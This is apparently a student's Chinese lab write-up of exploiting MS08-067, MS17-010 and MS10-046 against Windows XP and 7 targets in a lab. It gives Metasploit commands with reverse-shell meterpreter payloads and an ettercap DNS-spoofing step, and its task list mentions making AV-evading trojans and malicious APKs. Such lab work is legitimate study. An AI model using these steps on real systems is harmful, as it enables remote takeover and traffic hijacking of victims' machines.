010706侯舒舒(作业漏洞测试)

2020 01 07

任务

  1. 完成三个实验(ms08067,ms17010,ms10046)
  2. 上述三个实验的具体实验过程(漏洞成因,影响版本等;写md,生成为pdf发送)
  3. 拓展实验:生成免杀木马文件,生成恶意的apk

第一个实验

  1. ms08-067
    • 实验名称
      • ms08-067
    • 实验环境
      • 攻击机 kali
      • 靶机 xp
    • 实验原理
      • windows的server服务在处理特质请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,SYSTEM权限执行任意命令。
    • 实验步骤
      • 先使用search搜寻一下
      • 在使用use exploit/windows/smb/ms08_067_netapi
      • 在show options查看
      • 在设置攻击载荷set payload windows/meterpreter/reverse_tcp
      • 设置攻击地址,和受害者地址。set rhost 192.168.226.131,set lhost 192.168.226.130
      • 攻击 run
        • 攻击成功截图

第二个实验

  1. ms17-010
    • 实验名称
      • ms17-010
    • 实验原理
      • Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序
    • 实验环境
      • 攻击机 kali
      • 靶机 Windows 7
    • 实验步骤
      • 先使用search搜寻一下
      • 在使用use exploit/windows/smb/ms17_010_eternalblue
      • 在show options查看
      • 在设置攻击载荷set payload windows/64/meterpreter/reverse_tcp
      • 设置攻击地址,和受害者地址。set rhost 192.168.226.132,set lhost 192.168.226.130
      • 攻击 run
        • 攻击成功截图

第三个实验

  1. ms10-046
    • 实验名称
      • ms10-046
    • 实验环境
      • 攻击机 kali
      • 靶机 xp
    • 实验原理
      • Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所制定的目标具有相同效果。Windows没有正确的处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在的位置就足以触发这个漏洞
    • 实验步骤
      • 先使用search搜寻一下
      • 在使用use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
      • 在show options查看
      • 在设置攻击载荷set payload windows/meterpreter/reverse_tcp
      • 设置攻击地址,和反转地址。set svhost 192.168.226.130,set lhost 192.168.226.130
      • run攻击等待
      • 进入/etc/ettcap/ 下的etter.dns 最下面加入一句*.com A 192.168.226.130
      • 使用ettercap -T -q -i eth0 -P dns_spoof //// 劫持网段
      • 最后靶机输入地址都会跳转到我们给的地址
        • 跳转截图
原文地址:https://www.cnblogs.com/demohou/p/12176509.html